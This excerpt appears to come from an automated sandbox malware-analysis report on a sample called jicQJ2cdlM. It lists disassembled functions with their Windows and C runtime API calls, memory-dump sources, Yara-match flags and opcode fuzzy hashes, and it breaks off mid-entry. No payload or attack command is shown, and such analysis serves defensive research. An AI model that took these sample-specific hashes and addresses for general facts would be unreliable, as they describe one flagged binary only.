                                                                                    • Instruction Fuzzy Hash: D331B032A0021AABDF259F65DC81EEE7BA5EF40714F144268FC05DB190E735CD90CBA0
                                                                                    Function 00401FB6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000005), ref: 00401FCB
                                                                                    • UpdateWindow.USER32 ref: 00401FD3
                                                                                    • ShowWindow.USER32(00000000), ref: 00401FE7
                                                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$MoveUpdate
                                                                                    • String ID:
                                                                                    • API String ID: 1339878773-0
                                                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                    • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                    • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                                                    Function 004290E9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                                                      • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                                                      • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 737400349-0
                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                                                    Function 00A09350 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00A0936A
                                                                                      • Part of subcall function 00A092B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A092E6
                                                                                      • Part of subcall function 00A092B7: ___AdjustPointer.LIBCMT ref: 00A09301
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00A0937F
                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A09390
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00A093B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 737400349-0
                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction ID: 4bbf12538a4d8cd15dc5212856b56dca32c91f94b9ca1c994aeaefd64942625d
                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction Fuzzy Hash: DA01177250014CBBDF125F95DD41EEB7B79EF98754F044008FE085A1A2C732E861EBA1
                                                                                    Function 00434F4F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                                                    • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                                                    Function 00A151B6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00A1515D,00000000,00000000,00000000,00000000,?,00A15415,00000006,0044A378), ref: 00A151E8
                                                                                    • GetLastError.KERNEL32(?,00A1515D,00000000,00000000,00000000,00000000,?,00A15415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00A12233), ref: 00A151F4
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A1515D,00000000,00000000,00000000,00000000,?,00A15415,00000006,0044A378,0044A370,0044A378,00000000), ref: 00A15202
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction ID: c246c778a12836a7cb450834223fa8d1ca4f2f23096c4c0a9085d065290f6a19
                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction Fuzzy Hash: 4501883BA51622EBC7214F79AC44AD777A8AF86B61B210630F905D7141D730D941CAE4
                                                                                    Function 0042614E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                    • String ID:
                                                                                    • API String ID: 78362717-0
                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                                                    Function 00A063B5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A063CF
                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00A063E3
                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A063FB
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A06413
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                    • String ID:
                                                                                    • API String ID: 78362717-0
                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction ID: afae4a127851befdd6db8abd39ba56ae1d9147aca645b3c8300a4e20014a7a46
                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction Fuzzy Hash: B701493260052DA7DF11EF54E902AEF77AAEF84314F000011FD11AB2C2CA71ED2182E0
                                                                                    Function 00A02BA2 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A02BD1
                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A02BEF
                                                                                      • Part of subcall function 009F86A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009F86C8
                                                                                      • Part of subcall function 009F86A7: Hash.LIBCMT ref: 009F8708
                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A02BF8
                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A02C18
                                                                                      • Part of subcall function 009FF6FF: Hash.LIBCMT ref: 009FF711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                    • String ID:
                                                                                    • API String ID: 2250070497-0
                                                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                    • Instruction ID: 69ee49cb2287ee41624dcd14219d5edbe746c162e0ba3d2657f590fc1dbd75b6
                                                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                    • Instruction Fuzzy Hash: D2118E72400708AFC715DF64C882ADAF7B8AF59320F004A6EE556C7192DB70F954CB50
                                                                                    Function 00A02BB1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A02BD1
                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A02BEF
                                                                                      • Part of subcall function 009F86A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009F86C8
                                                                                      • Part of subcall function 009F86A7: Hash.LIBCMT ref: 009F8708
                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A02BF8
                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A02C18
                                                                                      • Part of subcall function 009FF6FF: Hash.LIBCMT ref: 009FF711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                    • String ID:
                                                                                    • API String ID: 2250070497-0
                                                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                    • Instruction ID: 620ecf2e834d7bb1d8fcb6eae168f9b15f340481783de23e6072ca1a97b309fd
                                                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                    • Instruction Fuzzy Hash: 42012D72500608ABC715DF65D886EDAF7E8EF59310F008A2EE65687191DB70F954CB60
                                                                                    Function 00405944 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                                                      • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                                                    • __Getcoll.LIBCPMT ref: 004059A5
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                    • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                                                    • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                    • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                                                    Function 00404E88 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                                                      • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                                                    • __Getcoll.LIBCPMT ref: 00404EE9
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                    • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                                                    • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                    • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                                                    Function 009E50EF Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 009E50F6
                                                                                      • Part of subcall function 009EBDD3: __EH_prolog3_GS.LIBCMT ref: 009EBDDA
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E5141
                                                                                    • __Getcoll.LIBCPMT ref: 009E5150
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E5160
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                    • Instruction ID: a990ef1669ac24c9c92b8078f17ff0b009fb1c1f3aaeed179d5687b36a3ac250
                                                                                    • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                    • Instruction Fuzzy Hash: B2014CB1D10649DFDB01EFA5C841B9DB7B4BF84311F158429E055AB282DBB49A84CB51
                                                                                    Function 009E5BAB Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 009E5BB2
                                                                                      • Part of subcall function 009EBDD3: __EH_prolog3_GS.LIBCMT ref: 009EBDDA
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E5BFD
                                                                                    • __Getcoll.LIBCPMT ref: 009E5C0C
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E5C1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                    • Instruction ID: a68cf090f2ee3c2857d6eb44d7eaadb4b7a94b26998a63e142681a4ca5f2c7a0
                                                                                    • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                    • Instruction Fuzzy Hash: 91018C71C00749DFDB01EFA5C841B9DB7B4BF84310F108829E094AB282CBB59984CB91
                                                                                    Function 0041BEF7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                    • String ID:
                                                                                    • API String ID: 3973403980-0
                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                                                    Function 009FC15E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC190
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC1A0
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC1B0
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC1C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                    • String ID:
                                                                                    • API String ID: 3973403980-0
                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction ID: 51e04508c240f41d1dc3e837552c417ae8edf5902d9befd0c5f17e44f1f8cff8
                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction Fuzzy Hash: 6201C9BA50814DBBCF129E94DE429BD3B6ABF55350F24C412FE1884072D732C674AF92
                                                                                    Function 0040D244 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                                                      • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                                                      • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                    • String ID:
                                                                                    • API String ID: 4284812201-0
                                                                                    • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                    • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                                                    • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                    • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                                                    Function 0041352C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                                                      • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                                                      • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                                                    • GetLastError.KERNEL32 ref: 00413561
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                                                      • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                    • String ID:
                                                                                    • API String ID: 1674182817-0
                                                                                    • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                                                    • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                                                    Function 009ED4AB Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 009F1362
                                                                                      • Part of subcall function 009F0BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 009F0BF6
                                                                                      • Part of subcall function 009F0BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 009F0C17
                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 009F1375
                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 009F1381
                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 009F138A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                    • String ID:
                                                                                    • API String ID: 4284812201-0
                                                                                    • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                    • Instruction ID: 4388fe417676eb8c9382bbfe6cb189ad9b176a634ace2ab9c7b3428b3f765ee9
                                                                                    • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                    • Instruction Fuzzy Hash: A4F0BE3168470CA79F18BAA40852BBE269E5FD1320F48013AF712AB3C2CEB48E0593D5
                                                                                    Function 009F3793 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 009F37AC
